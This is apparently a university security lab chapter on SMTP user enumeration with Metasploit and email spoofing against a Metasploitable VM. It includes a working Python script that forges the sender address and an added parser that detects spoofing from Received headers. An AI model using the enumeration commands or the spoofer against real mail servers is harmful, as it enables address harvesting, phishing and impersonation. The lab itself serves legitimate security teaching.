Chapter 9 SMTP enumeration & email spoofing
For this lab you are going to attempt to build an email address spoofer that implements the SMTP protocol over TCP. Modern email servers have several solutions that make it more difficult to spoof emails. However, the SMTP protocol itself does not check that the message is coming from a valid server or that the email was actually created by the sender. To demonstrate this, we will set up a Metasploitable server.
9.2 SMTP enumeration
In an SMTP enumeration attack, an attacker tries to get a list of valid email addresses from a server. Kali Linux has
Step 1 Determine the IP address of the Metasploitable machine using the ifconfig command. Username: msfadmin Password: msfadmin
Step 2 Start the Metasploit console. Select the smtp_enum module by typing the following:
msf > use auxiliary/scanner/smtp/smtp_enum
Step 3 Set the host that you want to scan by typing the following. Replace xxx.xxx.xxx.xxx with the IP address of the Metasploitable machine.
msf auxiliary(smtp_enum) > set RHOSTS xxx.xxx.xxx.xxx
RHOSTS => 192.168.1.56
msf auxiliary(smtp_enum) > run
You should see a list of users on the server.
[Include screenshot below]
An attacker could use an SMTP enumeration attack to get the email addresses that are available on the server. In the following section we develop the software required to execute an SMTP attack.
9.3 Email Spoofing
Step 1. Download the free version of vmplayer. (You can also use VirtualBox if you already have it installed or just like it more.)
Step 2. Connect to the Metasploitable server via telnet.
telnet xxx.xx.xx.x 25
where xxx.xx.xx.x is the IP address of the Metasploitable server.
Remember that you can get the address of the Metasploitable server by logging in with username msfadmin and password msfadmin.
The Metasploitable server will now let you communicate with it via telnet. (Not encrypted, fun for snooping.)
Step 3 Follow the SMTP communication protocol process to send an email to
Great, now we have a mail server that is configured and that we can communicate with. Let's go ahead and write a TCP application that will carry out the process for us.
Step 4 Open the IDE.
The code below shows an implementation of a program that executes the SMTP protocol over a TCP connection.
import sys, socket

size = 1024  # maximum number of bytes read per server response

def sendMessage(smtpServer, port, fromAddress, toAddress, message):
    IP = smtpServer
    PORT = int(port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((IP, PORT))                                     # open socket on port
    print(s.recv(size).decode())                              # display server greeting
    s.send(b'HELO virginia.edu\r\n')                          # send HELO (SMTP lines end in CRLF)
    print(s.recv(size).decode())                              # display response
    s.send(b'MAIL FROM:<' + fromAddress.encode() + b'>\r\n')  # send MAIL FROM:
    print(s.recv(size).decode())                              # display response
    s.send(b'RCPT TO:<' + toAddress.encode() + b'>\r\n')      # send RCPT TO:
    print(s.recv(size).decode())                              # display response
    s.send(b'DATA\r\n')                                       # send DATA
    print(s.recv(size).decode())                              # display response
    s.send(message.encode() + b'\r\n')                        # send message
    s.send(b'.\r\n')                                          # a line with a single dot ends the message
    print(s.recv(size).decode())                              # display response
    s.send(b'QUIT\r\n')                                       # send QUIT
    print(s.recv(size).decode())                              # display response
    s.close()

def main(args):
    if len(args) < 6:
        print("usage: espoofer.py server port from to message...")
        sys.exit(1)
    smtpServer = args[1]
    port = args[2]
    fromAddress = args[3]
    toAddress = args[4]
    message = " ".join(args[5:])  # remaining words form the message body
    sendMessage(smtpServer, port, fromAddress, toAddress, message)

if __name__ == "__main__":
    main(sys.argv)
Step 5 Create a folder called spoofer on the Kali desktop, save the program above to the folder and call it espoofer.py
Step 6 Open the terminal and cd to ~/Desktop/spoofer
Step 7 Run the spoofer by typing the following command into the terminal.
python espoofer.py [IP-Metasploitable] 25 firstname.lastname@example.org sys Hello From the other side
[Include screen shot]
9.4 Checking to see that the email was correctly received.
Step 1 Log in to the Metasploitable server. Username: msfadmin Password: msfadmin
Step 2 Open the terminal and check the sys mailbox on the mail server by typing
sudo cat /var/spool/mail/sys
[Include a screen shot below]
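What the receiving server records about the message is more trustworthy than what the sender claimed in HELO and MAIL FROM. The following added example (not part of the original lab) parses one delivered message and reports where the two disagree. The sample message, the client IP 192.168.1.50, the host names, the queue id and the function name spoofing_indicators are constructed assumptions, and the Received line is assumed to be in Postfix's usual format.

```python
import email
import re

# Constructed sample of one message as it might appear in /var/spool/mail/sys
# (mbox "From " separator line omitted); all values are made up for illustration.
SAMPLE = """\
Return-Path: <firstname.lastname@example.org>
X-Original-To: sys
Delivered-To: sys@metasploitable.localdomain
Received: from virginia.edu (unknown [192.168.1.50])
\tby metasploitable.localdomain (Postfix) with SMTP id 0123456789
\tfor <sys>; Mon, 1 Jan 2024 10:00:00 -0500 (EST)

Hello From the other side
"""

# Assumed Postfix format: from <HELO name> (<reverse DNS or "unknown"> [<client IP>])
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([0-9a-fA-F.:]+)\]\)")

def spoofing_indicators(raw_message):
    """Return reasons the sender's claimed identity is not backed by server-side facts."""
    msg = email.message_from_string(raw_message)
    received = msg.get_all("Received") or []
    if not received:
        return ["no Received header to check"]
    # The topmost Received header was written by our own server, so only it is trusted.
    m = RECEIVED_RE.search(received[0])
    if not m:
        return ["Received header not in the expected Postfix format"]
    helo, rdns, ip = m.groups()
    findings = []
    if rdns == "unknown":
        findings.append(f"client {ip} has no verified reverse DNS")
    elif rdns.lower() != helo.lower():
        findings.append(f"HELO {helo} does not match reverse DNS {rdns}")
    # A domain mismatch also occurs in legitimate mail: treat it as a hint, not proof.
    sender = (msg.get("Return-Path") or "").strip("<> ")
    sender_domain = sender.rpartition("@")[2].lower()
    if sender_domain and sender_domain != helo.lower():
        findings.append(f"envelope domain {sender_domain} differs from HELO {helo}")
    return findings

if __name__ == "__main__":
    for reason in spoofing_indicators(SAMPLE):
        print("-", reason)
```
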